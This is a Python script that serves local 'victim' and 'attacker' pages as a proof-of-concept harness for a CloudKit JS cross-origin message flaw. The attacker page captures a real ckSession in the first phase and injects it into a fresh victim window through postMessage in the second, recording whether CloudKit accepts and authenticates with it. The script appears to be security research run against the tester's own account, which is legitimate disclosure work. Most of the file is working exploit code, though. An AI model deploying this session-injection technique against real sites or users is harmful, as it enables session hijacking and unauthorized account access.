#!/usr/bin/env python3
"""
iPhone/iSH real-account validation for the CloudKit JS cross-origin message issue.

Serves two LOCAL origins only:
  victim   http://localhost:18133
  attacker http://localhost:18134

The CloudKit API token and real ckSession remain in Safari memory only.
The Python server never receives either value.

Flow:
  1. Open attacker page in Safari and paste the development CloudKit API token.
  2. Phase 1 opens a victim window. Sign in with YOUR OWN Apple Account.
     The harness captures the resulting ckSession in the attacker tab's memory.
  3. Phase 2 opens a fresh victim window. Tap "Arm sign-in listener".
     The attacker origin injects the previously captured legitimate ckSession.
  4. The harness records whether CloudKit accepts that cross-origin session and
     subsequently authenticates the fresh victim.

No CloudKit records are read/written. Only CloudKit users/caller auth bootstrap
traffic generated by CloudKit JS is allowed.
"""

from __future__ import annotations
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
import threading

VICTIM_PORT = 18133
ATTACKER_PORT = 18134

VICTIM_HTML = r"""<!doctype html>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
<title>CloudKit victim — local research</title>
<style>
body{font-family:-apple-system,BlinkMacSystemFont,sans-serif;max-width:720px;margin:0 auto;padding:22px;background:#0b0b0d;color:#f4f4f5}
.card{background:#17171b;border:1px solid #303038;border-radius:16px;padding:18px;margin:14px 0}
button{font:inherit;font-weight:650;border:0;border-radius:12px;padding:14px 16px;width:100%;margin:8px 0}
.primary{background:#fff;color:#000}.danger{background:#ff453a;color:#fff}
code{word-break:break-word}.muted{color:#aaa} .ok{color:#30d158}.bad{color:#ff453a}
#log{white-space:pre-wrap;font-family:ui-monospace,monospace;font-size:12px}
</style>
<h1>CloudKit victim</h1>
<div class="card">
  <div>Container: <code>iCloud.com.nightvibes.prism</code></div>
  <div>Mode: <b id="mode"></b></div>
  <div>Status: <b id="status">initializing…</b></div>
</div>
<div class="card">
  <div id="apple-sign-in-button"></div>
  <div id="apple-sign-out-button"></div>
  <button id="arm" class="danger" hidden>Arm sign-in listener for injection</button>
</div>
<div class="card"><div id="log"></div></div>
<script src="https://cdn.apple-cloudkit.com/ck/2/cloudkit.js"></script>
<script>
"use strict";
(() => {
  const CONTAINER = "iCloud.com.nightvibes.prism";
  const mode = location.hash === "#inject" ? "inject" : "capture";
  const statusEl = document.getElementById("status");
  const modeEl = document.getElementById("mode");
  const arm = document.getElementById("arm");
  const logEl = document.getElementById("log");
  modeEl.textContent = mode;

  let apiToken = null;
  let tokenMemory = {};
  let tokenWrites = [];
  let requestEvents = [];
  let setupPromise = null;
  let authPopup = null;
  let configured = false;
  let authenticating = false;

  const log = (s) => {
    logEl.textContent += (logEl.textContent ? "\n" : "") + s;
  };
  const send = (type, payload={}) => {
    try { window.opener && window.opener.postMessage({type, mode, ...payload}, "http://localhost:18134"); } catch(e) {}
  };
  const hash = async (text) => {
    const b = new TextEncoder().encode(text);
    const d = await crypto.subtle.digest("SHA-256", b);
    return [...new Uint8Array(d)].map(x=>x.toString(16).padStart(2,"0")).join("").slice(0,16);
  };

  // Keep a handle only so the harness can close the unused Apple popup after a successful injected auth.
  const nativeOpen = window.open.bind(window);
  window.open = function(...args) {
    authPopup = nativeOpen(...args);
    send("authPopupOpened", {opened: !!authPopup});
    return authPopup;
  };

  async function instrumentedFetch(input, init) {
    const u = typeof input === "string" ? input : input.url;
    let meta = {path:"", hasWebAuthToken:false, tokenFingerprint:null, status:null};
    try {
      const url = new URL(u);
      meta.path = url.pathname;
      const wt = url.searchParams.get("ckWebAuthToken");
      meta.hasWebAuthToken = !!wt;
      if (wt) meta.tokenFingerprint = await hash(wt);
    } catch(e) {}
    const r = await fetch(input, init);
    meta.status = r.status;
    requestEvents.push(meta);
    send("cloudKitRequest", meta);
    return r;
  }

  function configure() {
    if (configured || !apiToken) return;
    configured = true;
    CloudKit.configure({
      locale: "en-us",
      services: {
        logger: console,
        fetch: instrumentedFetch,
        authTokenStore: {
          putToken: async (id, tok) => {
            tokenMemory[id] = tok;
            const rec = {id, length:String(tok||"").length, fingerprint: tok ? await hash(tok) : null};
            tokenWrites.push(rec);
            send("tokenWrite", rec);
            // In capture mode we intentionally relay our OWN session to the local attacker controller.
            // Nothing is persisted or sent to the Python server.
            if (mode === "capture" && tok) {
              send("capturedRealSession", {token:tok, length:String(tok).length, fingerprint:await hash(tok)});
            }
          },
          getToken: id => tokenMemory[id] || null
        }
      },
      containers: [{
        containerIdentifier: CONTAINER,
        environment: "development",
        apiTokenAuth: {
          apiToken,
          persist: false,
          signInButton: {id:"apple-sign-in-button", theme:"black"},
          signOutButton: {id:"apple-sign-out-button", theme:"black"}
        }
      }]
    });

    const container = CloudKit.getDefaultContainer();
    setupPromise = container.setUpAuth()
      .then(identity => {
        statusEl.textContent = identity ? "authenticated" : "not signed in";
        statusEl.className = identity ? "ok" : "";
        send("setupResolved", {authenticated:!!identity});
        if (mode === "inject") arm.hidden = false;
        return identity;
      })
      .catch(err => {
        statusEl.textContent = "setup error";
        statusEl.className = "bad";
        send("setupError", {message:String(err && (err.message || err))});
      });
    send("configured", {cloudKitVersion:CloudKit.VERSION || null});
  }

  // Attacker controller supplies only the API token at runtime.
  window.addEventListener("message", e => {
    if (e.origin !== "http://localhost:18134" || e.source !== window.opener) return;
    const d = e.data || {};
    if (d.type === "config" && typeof d.apiToken === "string" && d.apiToken) {
      apiToken = d.apiToken;
      configure();
    }
  });

  arm.addEventListener("click", () => {
    const btn = document.querySelector("#apple-sign-in-button .apple-auth-button, #apple-sign-in-button button, #apple-sign-in-button a");
    if (!btn) {
      log("CloudKit sign-in control not found.");
      send("armFailed", {reason:"sign-in control not found"});
      return;
    }
    authenticating = true;
    btn.click();
    send("listenerArmed", {popupOpened:!!authPopup});
    statusEl.textContent = "listener armed — waiting for cross-origin message";
  });

  send("victimReady", {mode});
})();
</script>
"""

ATTACKER_HTML = r"""<!doctype html>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
<title>CloudKit real-account PoC controller</title>
<style>
body{font-family:-apple-system,BlinkMacSystemFont,sans-serif;max-width:760px;margin:0 auto;padding:22px;background:#0b0b0d;color:#f4f4f5}
.card{background:#17171b;border:1px solid #303038;border-radius:16px;padding:18px;margin:14px 0}
input{font:inherit;box-sizing:border-box;width:100%;padding:13px;border-radius:10px;border:1px solid #444;background:#0d0d10;color:#fff}
button{font:inherit;font-weight:650;border:0;border-radius:12px;padding:14px 16px;width:100%;margin:8px 0}
.primary{background:#0a84ff;color:white}.secondary{background:#2c2c2e;color:white}.danger{background:#ff453a;color:white}
code{word-break:break-word}.muted{color:#aaa}.ok{color:#30d158}.bad{color:#ff453a}
#log{white-space:pre-wrap;font-family:ui-monospace,monospace;font-size:12px;max-height:350px;overflow:auto}
</style>
<h1>CloudKit real-account test</h1>
<div class="card">
  <b>Container</b><br><code>iCloud.com.nightvibes.prism</code>
  <p class="muted">The API token and CloudKit session stay in Safari memory. Reloading this page clears them.</p>
  <label>Development CloudKit API token</label>
  <input id="apiToken" type="password" autocomplete="off" autocapitalize="off" spellcheck="false" placeholder="Paste token here">
</div>
<div class="card">
  <button id="phase1" class="primary">1. Open victim and sign in to my Apple Account</button>
  <button id="phase2" class="danger" disabled>2. Open fresh victim for cross-origin injection</button>
  <button id="export" class="secondary" disabled>Copy sanitized result</button>
</div>
<div class="card">
  <div>Status: <b id="status">ready</b></div>
  <div id="summary"></div>
</div>
<div class="card"><div id="log"></div></div>
<script>
"use strict";
(() => {
  const api = document.getElementById("apiToken");
  const p1 = document.getElementById("phase1");
  const p2 = document.getElementById("phase2");
  const ex = document.getElementById("export");
  const status = document.getElementById("status");
  const summary = document.getElementById("summary");
  const logEl = document.getElementById("log");

  let captureWin = null, injectWin = null;
  let realSession = null;
  let realSessionFingerprint = null;
  let result = {
    container:"iCloud.com.nightvibes.prism",
    cloudKitVersion:null,
    capture:{realSessionObserved:false},
    injection:{
      listenerArmed:false,
      crossOriginSessionSent:false,
      sessionAccepted:false,
      propagatedToCloudKitRequest:false,
      authenticated:false
    },
    requestEvidence:[]
  };

  const log = s => {
    logEl.textContent += (logEl.textContent ? "\n" : "") + s;
    logEl.scrollTop = logEl.scrollHeight;
  };
  const setStatus = (s, cls="") => { status.textContent=s; status.className=cls; };

  function token() {
    const t=api.value.trim();
    if(!t){ alert("Paste the DEVELOPMENT CloudKit API token first."); return null; }
    return t;
  }
  function openVictim(mode) {
    const w=window.open("http://localhost:18133/#"+mode, "ck-"+mode+"-"+Date.now());
    if(!w) alert("Safari blocked the popup. Allow popups for localhost and try again.");
    return w;
  }

  p1.onclick=()=>{
    if(!token()) return;
    realSession=null; realSessionFingerprint=null;
    captureWin=openVictim("capture");
    setStatus("Phase 1: sign in in the victim window");
    log("Opened capture victim. Complete Apple sign-in there.");
  };

  p2.onclick=()=>{
    if(!token() || !realSession) return;
    try{captureWin && captureWin.close();}catch(e){}
    injectWin=openVictim("inject");
    result.injection={listenerArmed:false,crossOriginSessionSent:false,sessionAccepted:false,propagatedToCloudKitRequest:false,authenticated:false};
    result.requestEvidence=[];
    setStatus("Phase 2: fresh victim opened");
    log("Fresh unauthenticated victim opened. Tap its “Arm sign-in listener” button.");
  };

  window.addEventListener("message", e=>{
    if(e.origin!=="http://localhost:18133") return;
    const d=e.data||{};
    if(d.type==="victimReady"){
      const w=d.mode==="capture"?captureWin:injectWin;
      if(e.source!==w) return;
      w.postMessage({type:"config",apiToken:token()}, "http://localhost:18133");
      log("Configured "+d.mode+" victim.");
    }
    if(d.type==="configured"){
      result.cloudKitVersion=d.cloudKitVersion||result.cloudKitVersion;
    }
    if(d.type==="capturedRealSession" && e.source===captureWin){
      realSession=d.token;
      realSessionFingerprint=d.fingerprint;
      result.capture.realSessionObserved=true;
      result.capture.sessionLength=d.length;
      result.capture.sessionFingerprint=d.fingerprint;
      p2.disabled=false;
      setStatus("Real CloudKit session captured in memory", "ok");
      summary.innerHTML="<p class=ok>Phase 1 PASS: legitimate session captured. Token value is not displayed or persisted.</p>";
      log("Captured legitimate session fingerprint "+d.fingerprint+".");
    }
    if(d.type==="listenerArmed" && e.source===injectWin){
      result.injection.listenerArmed=true;
      setStatus("Injecting legitimate session from attacker origin…");
      setTimeout(()=>{
        injectWin.postMessage({ckSession:realSession}, "http://localhost:18133");
        result.injection.crossOriginSessionSent=true;
        log("Sent legitimate ckSession from attacker origin to fresh victim.");
      },250);
    }
    if(d.type==="tokenWrite" && e.source===injectWin && realSessionFingerprint && d.fingerprint===realSessionFingerprint){
      result.injection.sessionAccepted=true;
      log("Fresh victim accepted the attacker-origin session into CloudKit authTokenStore.");
    }
    if(d.type==="cloudKitRequest" && e.source===injectWin){
      const ev={path:d.path,status:d.status,hasWebAuthToken:d.hasWebAuthToken,tokenMatchesCaptured:!!(d.tokenFingerprint&&d.tokenFingerprint===realSessionFingerprint)};
      result.requestEvidence.push(ev);
      if(ev.tokenMatchesCaptured){
        result.injection.propagatedToCloudKitRequest=true;
        log("Injected real session propagated as ckWebAuthToken on "+d.path+" (HTTP "+d.status+").");
      }
    }
    if(d.type==="setupResolved" && e.source===injectWin && d.authenticated){
      result.injection.authenticated=true;
      ex.disabled=false;
      const ok=result.injection.sessionAccepted&&result.injection.propagatedToCloudKitRequest;
      setStatus(ok?"REAL-ACCOUNT PRIMITIVE CONFIRMED":"Authenticated; inspect evidence",ok?"ok":"");
      summary.innerHTML="<p class="+(ok?"ok":"")+">Fresh victim authenticated: <b>YES</b><br>Cross-origin session accepted: <b>"+result.injection.sessionAccepted+"</b><br>Propagated as ckWebAuthToken: <b>"+result.injection.propagatedToCloudKitRequest+"</b></p>";
      try{injectWin.close();}catch(e){}
    }
  });

  ex.onclick=async()=>{
    const safe=JSON.stringify(result,null,2);
    try{
      await navigator.clipboard.writeText(safe);
      setStatus("Sanitized result copied", "ok");
    }catch(e){
      prompt("Copy sanitized result:",safe);
    }
  };
})();
</script>
"""

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = (VICTIM_HTML if self.server.server_port == VICTIM_PORT else ATTACKER_HTML).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Cache-Control", "no-store")
        self.send_header("Content-Security-Policy",
            "default-src 'self' https://cdn.apple-cloudkit.com https://*.apple.com https://*.icloud.com https://*.apple-cloudkit.com; "
            "script-src 'self' 'unsafe-inline' https://cdn.apple-cloudkit.com; "
            "connect-src https://*.apple-cloudkit.com https://*.icloud.com https://*.apple.com; "
            "frame-src https://*.apple.com https://*.icloud.com; img-src data: https:; style-src 'unsafe-inline' 'self';")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        # Do not log paths/query strings. The API/session tokens never reach this server anyway.
        return

def serve(port):
    srv = ThreadingHTTPServer(("0.0.0.0", port), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

if __name__ == "__main__":
    servers = [serve(VICTIM_PORT), serve(ATTACKER_PORT)]
    print("CloudKit iPhone research harness is running.")
    print("Open Safari to: http://localhost:18134/")
    print("Victim origin:   http://localhost:18133/")
    print("Container:       iCloud.com.nightvibes.prism")
    print("No API token or ckSession is logged by this Python process.")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        for s in servers:
            s.shutdown()
